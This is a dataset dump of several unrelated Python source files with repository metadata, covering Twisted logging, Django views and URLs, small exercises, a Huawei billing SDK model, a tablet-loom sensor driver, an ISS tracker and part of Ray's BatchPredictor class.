] | permissive | BeaverInc/covid19CityMontreal | 62dac14840dadcdf20985663bc2527c90bab926c | 1b283589f6885977a179effce20212a9311a2ac0 | refs/heads/master | 2021-05-22T20:01:22.443897 | 2020-06-21T08:00:57 | 2020-06-21T08:00:57 | 253,067,914 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,237 | py | # -*- test-case-name: twisted.logger.test.test_legacy -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Integration with L{twisted.python.log}.
"""
from zope.interface import implementer
from ._levels import LogLevel
from ._format import formatEvent
from ._observer import ILogObserver
from ._stdlib import fromStdlibLogLevelMapping, StringifiableFromEvent
@implementer(ILogObserver)
class LegacyLogObserverWrapper(object):
"""
L{ILogObserver} that wraps an L{twisted.python.log.ILogObserver}.
Received (new-style) events are modified prior to forwarding to
the legacy observer to ensure compatibility with observers that
expect legacy events.
"""
def __init__(self, legacyObserver):
"""
@param legacyObserver: a legacy observer to which this observer will
forward events.
@type legacyObserver: L{twisted.python.log.ILogObserver}
"""
self.legacyObserver = legacyObserver
def __repr__(self):
return (
"{self.__class__.__name__}({self.legacyObserver})"
.format(self=self)
)
def __call__(self, event):
"""
Forward events to the legacy observer after editing them to
ensure compatibility.
@param event: an event
@type event: L{dict}
"""
# The "message" key is required by textFromEventDict()
if "message" not in event:
event["message"] = ()
if "time" not in event:
event["time"] = event["log_time"]
if "system" not in event:
event["system"] = event.get("log_system", "-")
# Format new style -> old style
if "format" not in event and event.get("log_format", None) is not None:
# Create an object that implements __str__() in order to defer the
# work of formatting until it's needed by a legacy log observer.
event["format"] = "%(log_legacy)s"
event["log_legacy"] = StringifiableFromEvent(event.copy())
# In the old-style system, the 'message' key always holds a tuple
# of messages. If we find the 'message' key here to not be a
# tuple, it has been passed as new-style parameter. We drop it
# here because we render it using the old-style 'format' key,
# which otherwise doesn't get precedence, and the original event
# has been copied above.
if not isinstance(event["message"], tuple):
event["message"] = ()
# From log.failure() -> isError blah blah
if "log_failure" in event:
if "failure" not in event:
event["failure"] = event["log_failure"]
if "isError" not in event:
event["isError"] = 1
if "why" not in event:
event["why"] = formatEvent(event)
elif "isError" not in event:
if event["log_level"] in (LogLevel.error, LogLevel.critical):
event["isError"] = 1
else:
event["isError"] = 0
self.legacyObserver(event)
def publishToNewObserver(observer, eventDict, textFromEventDict):
"""
Publish an old-style (L{twisted.python.log}) event to a new-style
(L{twisted.logger}) observer.
@note: It's possible that a new-style event was sent to a
L{LegacyLogObserverWrapper}, and may now be getting sent back to a
new-style observer. In this case, it's already a new-style event,
adapted to also look like an old-style event, and we don't need to
tweak it again to be a new-style event, hence the checks for
already-defined new-style keys.
@param observer: A new-style observer to handle this event.
@type observer: L{ILogObserver}
@param eventDict: An L{old-style <twisted.python.log>}, log event.
@type eventDict: L{dict}
@param textFromEventDict: callable that can format an old-style event as a
string. Passed here rather than imported to avoid circular dependency.
@type textFromEventDict: 1-arg L{callable} taking L{dict} returning L{str}
@return: L{None}
"""
if "log_time" not in eventDict:
eventDict["log_time"] = eventDict["time"]
if "log_format" not in eventDict:
text = textFromEventDict(eventDict)
if text is not None:
eventDict["log_text"] = text
eventDict["log_format"] = u"{log_text}"
if "log_level" not in eventDict:
if "logLevel" in eventDict:
try:
level = fromStdlibLogLevelMapping[eventDict["logLevel"]]
except KeyError:
level = None
elif "isError" in eventDict:
if eventDict["isError"]:
level = LogLevel.critical
else:
level = LogLevel.info
else:
level = LogLevel.info
if level is not None:
eventDict["log_level"] = level
if "log_namespace" not in eventDict:
eventDict["log_namespace"] = u"log_legacy"
if "log_system" not in eventDict and "system" in eventDict:
eventDict["log_system"] = eventDict["system"]
observer(eventDict)
| [
"36340780+lanyutian88@users.noreply.github.com"
] | 36340780+lanyutian88@users.noreply.github.com |
ec426d669943b3d906bdcdccc8e76b6d1897ad9b | acb8e84e3b9c987fcab341f799f41d5a5ec4d587 | /langs/0/a_3.py | e0a7ff1e0dc59d9650eba21bd241d7f4111cf12e | [] | no_license | G4te-Keep3r/HowdyHackers | 46bfad63eafe5ac515da363e1c75fa6f4b9bca32 | fb6d391aaecb60ab5c4650d4ae2ddd599fd85db2 | refs/heads/master | 2020-08-01T12:08:10.782018 | 2016-11-13T20:45:50 | 2016-11-13T20:45:50 | 73,624,224 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | import sys
def printFunction(lineRemaining):
if lineRemaining[0] == '"' and lineRemaining[-1] == '"':
if len(lineRemaining) > 2:
#data to print
lineRemaining = lineRemaining[1:-1]
print ' '.join(lineRemaining)
else:
print
def main(fileName):
with open(fileName) as f:
for line in f:
data = line.split()
if data[0] == 'a_3':
printFunction(data[1:])
else:
print 'ERROR'
return
if __name__ == '__main__':
main(sys.argv[1]) | [
"juliettaylorswift@gmail.com"
] | juliettaylorswift@gmail.com |
e3bc0a518cc3efc7e7c027f9b002fdbccbd0ed8f | 67a0618de2844f175e74684214d45d1ba4b78554 | /core/views.py | 1e20ab3fe39e835fec71321975a7adf4527011eb | [
"MIT"
] | permissive | fantasiforbundet/grenselandet | c748fa0701d5c96351da916678f771e3717dea10 | d0a8878fa2aa1ee65737702d86ef25482bf46bff | refs/heads/master | 2020-11-26T20:56:00.828700 | 2015-02-06T16:45:16 | 2015-02-06T16:45:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 793 | py | # -*- coding: utf-8 -*-
""" Generic views for webpage """
from django.views.generic.base import TemplateView
from django.conf import settings
class TextTemplateView(TemplateView):
""" Render plain text file. """
def render_to_response(self, context, **response_kwargs):
response_kwargs['content_type'] = 'text/plain'
return super(TemplateView, self).render_to_response(context, **response_kwargs)
class HumansTxtView(TextTemplateView):
""" humans.txt contains information about who made the site. """
template_name = 'humans.txt'
class RobotsTxtView(TextTemplateView):
""" robots.txt contains instructions for webcrawler bots. """
if settings.DEBUG:
template_name = 'robots-debug.txt'
else:
template_name = 'robots.txt'
| [
"haakenlid@gmail.com"
] | haakenlid@gmail.com |
05d8f7afde2beb0ee1fa60b24698bbaec6bff6ee | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_072/ch37_2019_10_01_17_50_41_334636.py | d8c0718ce3db7304a4911b49043117ba88bc9165 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 481 | py | def eh_primo(numero):
i=3
if numero==0 or numero==1:
return False
if numero==2:
return True
if numero%2==0:
return False
while numero>i:
if numero%i==0:
return False
i+=2
return True
def lista_primos(z):
i=1
lista=[]
while len(lista)<z:
if eh_primo(i)==True:
lista.append(i)
i+=1
return lista
| [
"you@example.com"
] | you@example.com |
dc9bfe97a28ba15b3cac30f50bd63591f69f984a | 70b0d4b4440a97b648a08de0d89cc536e8f4c569 | /programmersaddsum.py | c1984961c684f7f8ddcf59b1e5cede34e7782682 | [] | no_license | seoseokbeom/leetcode | 01c9ca8a23e38a3d3c91d2de26f0b2a3a1710487 | 9d68de2271c2d5666750c8060407b56abbf6f45d | refs/heads/master | 2023-03-27T20:20:24.790750 | 2021-03-25T04:43:50 | 2021-03-25T04:43:50 | 273,779,517 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 214 | py | import itertools
def solution(numbers):
arriter = itertools.combinations(numbers, 2)
res = set()
for v in arriter:
res.add(sum(v))
return sorted(list(res))
print(solution([5, 0, 2, 7]))
| [
"pronunciatio@naver.com"
] | pronunciatio@naver.com |
40cfca4342379984f26a53b5676ab401bdc45adf | 67bafcfbd2caa774eb3765e6b2e28b7accbf1307 | /API/run.py | 59ff19dc4a977469c88d18edb48c65459cb43d58 | [] | no_license | andy6804tw/digit-recognizer-project | 9b8f1a226001665019bb15845db24138615ac81d | 523920662cb853de0a08639ddfd449f0984a4d8e | refs/heads/master | 2021-07-06T21:20:26.633250 | 2020-03-03T10:38:06 | 2020-03-03T10:38:06 | 230,412,581 | 3 | 0 | null | 2021-05-06T19:49:15 | 2019-12-27T09:19:50 | HTML | UTF-8 | Python | false | false | 215 | py | from app import app
import config
@app.route('/')
def index():
return 'server started on '+str(config.PORT)+' PORT '+str(config.ENV)
if __name__ == '__main__':
print(app.url_map)
app.run(port=config.PORT)
| [
"andy6804tw@yahoo.com.tw"
] | andy6804tw@yahoo.com.tw |
92becf83a6decd3886bcd0a4bd1e591fe2d98fbe | 8d9318a33afc2c3b5ca8ac99fce0d8544478c94a | /Books/Casandra DB/opscenter-5.1.0/lib/py-redhat/2.6/shared/i386/twisted/internet/wxreactor.py | 380f36a8bb080347bd6b30d068fc1ee3263eac32 | [] | no_license | tushar239/git-large-repo | e30aa7b1894454bf00546312a3fb595f6dad0ed6 | 9ee51112596e5fc3a7ab2ea97a86ec6adc677162 | refs/heads/master | 2021-01-12T13:48:43.280111 | 2016-11-01T22:14:51 | 2016-11-01T22:14:51 | 69,609,373 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 57 | py | ../../../../../../py-unpure/twisted/internet/wxreactor.py | [
"tushar239@gmail.com"
] | tushar239@gmail.com |
39e70a4daa73f14bc0fd321efc59599fa0359c32 | 7f9d4bce21b6d03ff7976c1462556db593abc2b2 | /python3/0392.py | 1756a1bf9cf8384ec1d78b45e95931f24318efe2 | [] | no_license | crazykuma/leetcode | 116343080f3869a5395fb60a46ac0556d170fa15 | cc186fddf09592607bd18d333a99980703ac1ab3 | refs/heads/master | 2020-09-11T12:27:21.863546 | 2020-05-20T05:43:07 | 2020-05-20T05:43:07 | 222,064,196 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 888 | py | class Solution:
def isSubsequence(self, s: str, t: str) -> bool:
if not s:
# s为空时是任何字符串的子集
return True
if len(set(s)-set(t)) > 0:
# s与t的差异不为空时,s不是任何t的子集
return False
i, j = 0, 0
m, n = len(s), len(t)
cur = ''
while i < m and j < n:
# 判断字符串t的值是否是下一个字符串s的值
if t[j] != s[i]:
j += 1
else:
cur += t[j]
if s == cur:
return True
i += 1
j += 1
return False
if __name__ == "__main__":
s = Solution()
assert s.isSubsequence("", "ahbgdc") == True
assert s.isSubsequence("abc", "ahbgdc") == True
assert s.isSubsequence("axc", "ahbgdc") == False
| [
"crazykuma@qq.com"
] | crazykuma@qq.com |
9a65e431490dc31d401ad844749544f12fa401fd | 407aa951fe64227c685eccd698b59959f2093dfc | /featureTests/1_DATA_ANALYSIS/0_delete_samples.py | 9b69d80728a4e044a45de5998d59a1fdae37bd30 | [] | no_license | sycophant-stone/tf_base | 32ad6798b2fcd728d959070a8eaf81649c9e247f | f6b4cb26fbc294e2a24dfa5d2ce05b9b33d77d41 | refs/heads/master | 2023-04-03T21:09:57.893549 | 2019-09-30T07:09:56 | 2019-09-30T07:09:56 | 138,027,678 | 4 | 0 | null | 2023-03-24T21:55:38 | 2018-06-20T12:06:55 | Jupyter Notebook | UTF-8 | Python | false | false | 516 | py | import os
def select_intrest_pics(pic_path):
n_img = len(os.listdir(pic_path))
print(n_img)
#assert n_img == 9963, 'VOC2007 should be 9963 samples'
for i in xrange(n_img):
if i< 10:
continue
del_path = os.path.join(pic_path, '{:06d}.jpg'.format(i))
print('i:%d, num_img:%d, del_path:%s'%(i, n_img, del_path))
if os.path.exists(del_path):
os.system('rm %s'%(del_path))
if __name__ == '__main__' :
select_intrest_pics('VOC2007/JPEGImages/')
| [
"kawayi_rendroid@163.com"
] | kawayi_rendroid@163.com |
58201c9362a881f83503ddc545f74aa836b8e231 | 8c568d5ba0c4f05b10ac831d4961f34925d3db8e | /02_分支/venv/Scripts/easy_install-script.py | ce0265f2898a47f1d54b0ddbe00ba3315c9c54fa | [] | no_license | Yang-yc/Python | dbca12bf10f7eb628ab2676e56ea5dc8ebe025af | 985bafccb45232e3c2e24d14f5a1e0dd1ff67065 | refs/heads/master | 2022-12-31T00:47:01.659889 | 2020-09-27T07:11:32 | 2020-09-27T07:11:32 | 285,573,920 | 0 | 0 | null | null | null | null | WINDOWS-1252 | Python | false | false | 445 | py | #!D:\PyCharmÏîÄ¿\02_·ÖÖ§\venv\Scripts\python.exe -x
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install'
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install')()
)
| [
"ycc20121404@163.com"
] | ycc20121404@163.com |
9fb1d258d6a429a7dae5f4bb3c23b7102eefcec3 | f9d564f1aa83eca45872dab7fbaa26dd48210d08 | /huaweicloud-sdk-bss/huaweicloudsdkbss/v2/model/demand_product_rating_result.py | ede1c62619bc6e73fd02a2dcb025007886597aa1 | [
"Apache-2.0"
] | permissive | huaweicloud/huaweicloud-sdk-python-v3 | cde6d849ce5b1de05ac5ebfd6153f27803837d84 | f69344c1dadb79067746ddf9bfde4bddc18d5ecf | refs/heads/master | 2023-09-01T19:29:43.013318 | 2023-08-31T08:28:59 | 2023-08-31T08:28:59 | 262,207,814 | 103 | 44 | NOASSERTION | 2023-06-22T14:50:48 | 2020-05-08T02:28:43 | Python | UTF-8 | Python | false | false | 10,009 | py | # coding: utf-8
import six
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class DemandProductRatingResult:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'id': 'str',
'product_id': 'str',
'amount': 'decimal.Decimal',
'discount_amount': 'decimal.Decimal',
'official_website_amount': 'decimal.Decimal',
'measure_id': 'int',
'discount_rating_results': 'list[DemandDiscountRatingResult]'
}
attribute_map = {
'id': 'id',
'product_id': 'product_id',
'amount': 'amount',
'discount_amount': 'discount_amount',
'official_website_amount': 'official_website_amount',
'measure_id': 'measure_id',
'discount_rating_results': 'discount_rating_results'
}
def __init__(self, id=None, product_id=None, amount=None, discount_amount=None, official_website_amount=None, measure_id=None, discount_rating_results=None):
"""DemandProductRatingResult
The model defined in huaweicloud sdk
:param id: 同一次询价中不能重复,用于标识返回询价结果和请求的映射关系。
:type id: str
:param product_id: 按需产品的ID。
:type product_id: str
:param amount: 折扣的金额。
:type amount: :class:`huaweicloudsdkbss.v2.decimal.Decimal`
:param discount_amount: 优惠额(官网价和总价的差)。
:type discount_amount: :class:`huaweicloudsdkbss.v2.decimal.Decimal`
:param official_website_amount: 按需产品的官网价。
:type official_website_amount: :class:`huaweicloudsdkbss.v2.decimal.Decimal`
:param measure_id: 度量单位标识。 1:元
:type measure_id: int
:param discount_rating_results: 折扣优惠明细,包含产品本身的促销信息,同时包含商务或者伙伴折扣的优惠信息,具体参见表3。
:type discount_rating_results: list[:class:`huaweicloudsdkbss.v2.DemandDiscountRatingResult`]
"""
self._id = None
self._product_id = None
self._amount = None
self._discount_amount = None
self._official_website_amount = None
self._measure_id = None
self._discount_rating_results = None
self.discriminator = None
if id is not None:
self.id = id
if product_id is not None:
self.product_id = product_id
if amount is not None:
self.amount = amount
if discount_amount is not None:
self.discount_amount = discount_amount
if official_website_amount is not None:
self.official_website_amount = official_website_amount
if measure_id is not None:
self.measure_id = measure_id
if discount_rating_results is not None:
self.discount_rating_results = discount_rating_results
@property
def id(self):
"""Gets the id of this DemandProductRatingResult.
同一次询价中不能重复,用于标识返回询价结果和请求的映射关系。
:return: The id of this DemandProductRatingResult.
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this DemandProductRatingResult.
同一次询价中不能重复,用于标识返回询价结果和请求的映射关系。
:param id: The id of this DemandProductRatingResult.
:type id: str
"""
self._id = id
@property
def product_id(self):
"""Gets the product_id of this DemandProductRatingResult.
按需产品的ID。
:return: The product_id of this DemandProductRatingResult.
:rtype: str
"""
return self._product_id
@product_id.setter
def product_id(self, product_id):
"""Sets the product_id of this DemandProductRatingResult.
按需产品的ID。
:param product_id: The product_id of this DemandProductRatingResult.
:type product_id: str
"""
self._product_id = product_id
@property
def amount(self):
"""Gets the amount of this DemandProductRatingResult.
折扣的金额。
:return: The amount of this DemandProductRatingResult.
:rtype: :class:`huaweicloudsdkbss.v2.decimal.Decimal`
"""
return self._amount
@amount.setter
def amount(self, amount):
"""Sets the amount of this DemandProductRatingResult.
折扣的金额。
:param amount: The amount of this DemandProductRatingResult.
:type amount: :class:`huaweicloudsdkbss.v2.decimal.Decimal`
"""
self._amount = amount
@property
def discount_amount(self):
"""Gets the discount_amount of this DemandProductRatingResult.
优惠额(官网价和总价的差)。
:return: The discount_amount of this DemandProductRatingResult.
:rtype: :class:`huaweicloudsdkbss.v2.decimal.Decimal`
"""
return self._discount_amount
@discount_amount.setter
def discount_amount(self, discount_amount):
"""Sets the discount_amount of this DemandProductRatingResult.
优惠额(官网价和总价的差)。
:param discount_amount: The discount_amount of this DemandProductRatingResult.
:type discount_amount: :class:`huaweicloudsdkbss.v2.decimal.Decimal`
"""
self._discount_amount = discount_amount
@property
def official_website_amount(self):
"""Gets the official_website_amount of this DemandProductRatingResult.
按需产品的官网价。
:return: The official_website_amount of this DemandProductRatingResult.
:rtype: :class:`huaweicloudsdkbss.v2.decimal.Decimal`
"""
return self._official_website_amount
@official_website_amount.setter
def official_website_amount(self, official_website_amount):
"""Sets the official_website_amount of this DemandProductRatingResult.
按需产品的官网价。
:param official_website_amount: The official_website_amount of this DemandProductRatingResult.
:type official_website_amount: :class:`huaweicloudsdkbss.v2.decimal.Decimal`
"""
self._official_website_amount = official_website_amount
@property
def measure_id(self):
"""Gets the measure_id of this DemandProductRatingResult.
度量单位标识。 1:元
:return: The measure_id of this DemandProductRatingResult.
:rtype: int
"""
return self._measure_id
@measure_id.setter
def measure_id(self, measure_id):
"""Sets the measure_id of this DemandProductRatingResult.
度量单位标识。 1:元
:param measure_id: The measure_id of this DemandProductRatingResult.
:type measure_id: int
"""
self._measure_id = measure_id
@property
def discount_rating_results(self):
"""Gets the discount_rating_results of this DemandProductRatingResult.
折扣优惠明细,包含产品本身的促销信息,同时包含商务或者伙伴折扣的优惠信息,具体参见表3。
:return: The discount_rating_results of this DemandProductRatingResult.
:rtype: list[:class:`huaweicloudsdkbss.v2.DemandDiscountRatingResult`]
"""
return self._discount_rating_results
@discount_rating_results.setter
def discount_rating_results(self, discount_rating_results):
"""Sets the discount_rating_results of this DemandProductRatingResult.
折扣优惠明细,包含产品本身的促销信息,同时包含商务或者伙伴折扣的优惠信息,具体参见表3。
:param discount_rating_results: The discount_rating_results of this DemandProductRatingResult.
:type discount_rating_results: list[:class:`huaweicloudsdkbss.v2.DemandDiscountRatingResult`]
"""
self._discount_rating_results = discount_rating_results
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, DemandProductRatingResult):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"hwcloudsdk@huawei.com"
] | hwcloudsdk@huawei.com |
a2fb9b7cc2174067b3dd28bb67f67ab7ad054100 | 0627aa3a4b1349eccc56eb7315bd9e99bbf6d84b | /otus_stackoverflow/questions/urls.py | 81d04bee9a183168f45298518d81bc7e558c1b85 | [] | no_license | vsokoltsov/OTUS_PYTHON | 93bc0efd8011bf47bb838d241e56703e6d9278f7 | feac92294756385fe5021bfa838d27b9334d6b7b | refs/heads/master | 2022-12-11T04:28:12.450518 | 2019-03-23T15:39:39 | 2019-03-23T15:39:39 | 177,306,191 | 0 | 0 | null | 2022-12-08T02:30:43 | 2019-03-23T15:31:22 | Python | UTF-8 | Python | false | false | 1,537 | py | from django.conf.urls import url
from django.contrib.auth.decorators import login_required
from rest_framework.routers import DefaultRouter
from django.conf.urls import include
from .views import (
QuestionsView, QuestionCreateView, QuestionDetailView,
TagsListView, AnswerCreateView, VoteAnswerView, VoteQuestionView,
SearchView
)
from .api.v1 import QuestionViewSet
router = DefaultRouter()
router.register(
'v1/questions', QuestionViewSet,
base_name='api_v1_questions'
)
urlpatterns = [
url(r'^$', QuestionsView.as_view(), name='root_path'),
url(
r'^questions$', QuestionsView.as_view(), name='questions_list'
),
url(
r'^questions/new$', QuestionCreateView.as_view(), name='new_question'
),
url(
r'^questions/search$', SearchView.as_view(), name="questions_search"
),
url(
r'^questions/(?P<question_id>[A-Za-z0-9]*)$',
QuestionDetailView.as_view(), name='question_detail'
),
url(
r'^questions/(?P<question_id>[A-Za-z0-9]*)/answers$',
AnswerCreateView.as_view(), name="new_answer"
),
url(
r'^questions/(?P<question_id>[A-Za-z0-9]*)/vote$',
VoteQuestionView.as_view(), name="vote_question"
),
url(
r'^questions/(?P<question_id>[A-Za-z0-9]*)/answers/' +
r'(?P<answer_id>[A-Za-z0-9]*)/vote$',
VoteAnswerView.as_view(), name="vote_answer"
),
url(
r'^tags$', TagsListView.as_view(), name='tags_list'
),
url(r'api', include(router.urls)),
]
| [
"vforvad@gmail.com"
] | vforvad@gmail.com |
5adf8dc1a5f8953fc511c63cb60f5482a01c4c9f | 9d40cb0b457b2c8c787af7185af664b20df6845e | /tabletloom/driver-fabric.py | 9b064e9906999345e650bb7fd8b848d830ca79f5 | [] | no_license | fo-am/patternmatrix2 | f13365618179867a3e27efecf946ec8f5dea190d | 3ec85b334f7da256b96265e29482641f38002f95 | refs/heads/master | 2023-04-12T06:46:15.469411 | 2022-02-22T13:53:16 | 2022-02-22T13:53:16 | 92,929,344 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,146 | py | import smbus
import time
import mcp23017
import tangible
import osc
bus = smbus.SMBus(1)
mcp = [0x20,0x21,0x22,0x23]
# sensor orientation
dn = 0
up = 1
lr = 2
rl = 3
layout = [[0x20,0,dn], [0x20,1,dn], [0x20,2,dn], [0x20,3,dn],
[0x21,0,dn], [0x21,1,dn], [0x21,2,dn], [0x21,3,dn],
[0x22,0,dn], [0x22,1,dn], [0x22,2,dn], [0x22,3,dn],
[0x23,0,dn], [0x23,1,dn], [0x23,2,dn], [0x23,3,dn]]
tokens = {"circle": [[0,0,0,0],[1,1,1,1]],
"rectangle": [[0,1,
1,0],
[1,0,
0,1]],
"triangle": [[1,1,
0,0],
[0,1,
0,1],
[0,0,
1,1],
[1,0,
1,0]],
"square": [[0,0,0,1],[0,0,1,0],[0,1,0,0],[1,0,0,0],
[1,1,1,0],[1,1,0,1],[1,0,1,1],[0,1,1,1]]}
for address in mcp:
mcp23017.init_mcp(bus,address)
grid = tangible.sensor_grid(25,layout,tokens)
frequency=0.1
#######################################################
def convert_symbols(s):
return {tangible.convert_4bit_twist(v):k for k, v in s}
symbols = [["ccw",[1,1,1,1]],["cw",[0,0,0,0]],
["cw",[1,0,1,0]],["cw",[0,1,0,1]],
["flip-all",[1,1,0,0]],["flip-odd",[0,1,1,0]],["flip-even",[0,0,1,1]],["flip-fhalf",[1,0,0,1]],
["cw",[1,0,0,0]],["cw",[0,1,0,0]],["cw",[0,0,1,0]],["cw",[0,0,0,1]],
["cw",[0,1,1,1]],["cw",[1,0,1,1]],["cw",[1,1,0,1]],["cw",[1,1,1,0]]]
symbols = convert_symbols(symbols)
def build_pattern(data,symbols):
pat=[]
for i in range(0,4):
s=""
for v in data[i][:4]:
s+=symbols[v]+" "
pat.append(s)
return pat
def send_pattern(pat):
osc.Message("/eval",["(weave-instructions '(\n"+pat+"))"]).sendlocal(8000)
def send_col(col):
print("colour shift: "+col)
osc.Message("/eval",["(play-now (mul (adsr 0 0.1 1 0.1)"+
"(sine (mul (sine 30) 800))) 0)"+
"(set-warp-yarn! loom warp-yarn-"+col+")"+
"(set-weft-yarn! loom weft-yarn-"+col+")"]).sendlocal(8000)
#######################################################
last=""
last_col=0
while True:
for address in mcp:
grid.update(frequency,address,
mcp23017.read_inputs_a(bus,address),
mcp23017.read_inputs_b(bus,address))
pat = build_pattern(grid.data(4),symbols)
cc = pat[0]+pat[1]+pat[2]+pat[3]
if cc!=last:
last=cc
print(" "+pat[0]+pat[1]+pat[2]+pat[3]+"\n")
send_pattern(cc)
col=grid.state[15].value_current
if False: #col!=last_col:
last_col=col
if col==1: send_col("a")
if col==2: send_col("b")
if col==4: send_col("c")
if col==8: send_col("d")
if col==7: send_col("e")
if col==11: send_col("f")
if col==13: send_col("g")
if col==14: send_col("h")
#grid.pprint(5)
time.sleep(frequency)
| [
"dave@fo.am"
] | dave@fo.am |
e9054bddbbdc4a4c693bbaaf2cbc2fed48ce3e8f | 380372bbec9b77df14bb96fc32aca7061cca0635 | /astro/moon/iss1.py | cbe0e79c2cab4b1eabf19ca8b6856b125462b177 | [] | no_license | IchiroYoshida/python_public | d3c42dc31b3206db3a520a007ea4fb4ce6c1a6fd | 37ccadb1d3d42a38561c7708391f4c11836f5360 | refs/heads/master | 2023-08-16T17:19:07.278554 | 2023-08-13T21:29:51 | 2023-08-13T21:29:51 | 77,261,682 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 779 | py | import math
import time
from datetime import datetime
import ephem
degrees_per_radian = 180.0 / math.pi
home = ephem.Observer()
home.lon = '-122.63' # +E
home.lat = '45.56' # +N
home.elevation = 80 # meters
# Always get the latest ISS TLE data from:
# http://spaceflight.nasa.gov/realdata/sightings/SSapplications/Post/JavaSSOP/orbit/ISS/SVPOST.html
iss = ephem.readtle('ISS',
'1 25544U 98067A 16165.54018716 .00016717 00000-0 10270-3 0 9008',
'2 25544 51.6441 76.2279 0000507 322.3584 37.7533 15.54548251 4412'
)
while True:
home.date = datetime.utcnow()
iss.compute(home)
print('iss: altitude %4.1f deg, azimuth %5.1f deg' % (iss.alt * degrees_per_radian, iss.az * degrees_per_radian))
time.sleep(1.0)
| [
"yoshida.ichi@gmail.com"
] | yoshida.ichi@gmail.com |
31485937618d68ef869db43a4abc1a65af4ada04 | 399fb29d8525b6d7ac298783675d0d56e37bcac7 | /python/ray/train/batch_predictor.py | 82345a70f395d7c0a16d12f90e8e441591e85d9e | [
"MIT",
"BSD-3-Clause",
"Apache-2.0"
] | permissive | AmeerHajAli/ray | 40c9aebe0da59e9bcd70303d981bfe6b65007991 | 1ffd032f5f793d8817217a040f0f636f9372cd56 | refs/heads/master | 2023-03-28T10:50:09.186561 | 2023-03-24T23:08:08 | 2023-03-24T23:08:08 | 175,129,851 | 1 | 0 | Apache-2.0 | 2019-03-12T03:39:16 | 2019-03-12T03:39:14 | null | UTF-8 | Python | false | false | 21,509 | py | import inspect
import logging
from typing import Any, Dict, Optional, List, Type, Union, Callable
import pandas as pd
import numpy as np
import ray
from ray.air import Checkpoint
from ray.air.data_batch_type import DataBatchType
from ray.air.util.data_batch_conversion import BatchFormat
from ray.data import Dataset, DatasetPipeline, Preprocessor
from ray.data.context import DatasetContext
from ray.train.predictor import Predictor
from ray.util.annotations import PublicAPI
logger = logging.getLogger(__name__)
@PublicAPI(stability="beta")
class BatchPredictor:
"""Batch predictor class.
Takes a predictor class and a checkpoint and provides an interface to run
batch scoring on Ray datasets.
This batch predictor wraps around a predictor class and executes it
in a distributed way when calling ``predict()``.
"""
def __init__(
self, checkpoint: Checkpoint, predictor_cls: Type[Predictor], **predictor_kwargs
):
self._checkpoint = checkpoint
# Store as object ref so we only serialize it once for all map workers
self._checkpoint_ref = ray.put(checkpoint)
self._predictor_cls = predictor_cls
self._predictor_kwargs = predictor_kwargs
self._override_preprocessor: Optional[Preprocessor] = None
self._override_preprocessor_set = False
def __repr__(self):
return (
f"{self.__class__.__name__}(checkpoint={self._checkpoint}, "
f"predictor_cls={self._predictor_cls.__name__})"
)
@classmethod
def from_checkpoint(
cls, checkpoint: Checkpoint, predictor_cls: Type[Predictor], **kwargs
) -> "BatchPredictor":
"""Create a :class:`BatchPredictor` from a
:class:`~ray.air.checkpoint.Checkpoint`.
Example:
.. testcode::
from torchvision import models
from ray.train.batch_predictor import BatchPredictor
from ray.train.torch import TorchCheckpoint, TorchPredictor
model = models.resnet50(pretrained=True)
checkpoint = TorchCheckpoint.from_model(model)
predictor = BatchPredictor.from_checkpoint(checkpoint, TorchPredictor)
Args:
checkpoint: A :class:`~ray.air.checkpoint.Checkpoint` containing model state
and optionally a preprocessor.
predictor_cls: The type of predictor to use.
**kwargs: Optional arguments to pass the ``predictor_cls`` constructor.
"""
return cls(checkpoint=checkpoint, predictor_cls=predictor_cls, **kwargs)
@classmethod
def from_pandas_udf(
cls, pandas_udf: Callable[[pd.DataFrame], pd.DataFrame]
) -> "BatchPredictor":
"""Create a Predictor from a Pandas UDF.
Args:
pandas_udf: A function that takes a pandas.DataFrame and other
optional kwargs and returns a pandas.DataFrame.
"""
class PandasUDFPredictor(Predictor):
@classmethod
def from_checkpoint(cls, checkpoint, **kwargs):
return PandasUDFPredictor()
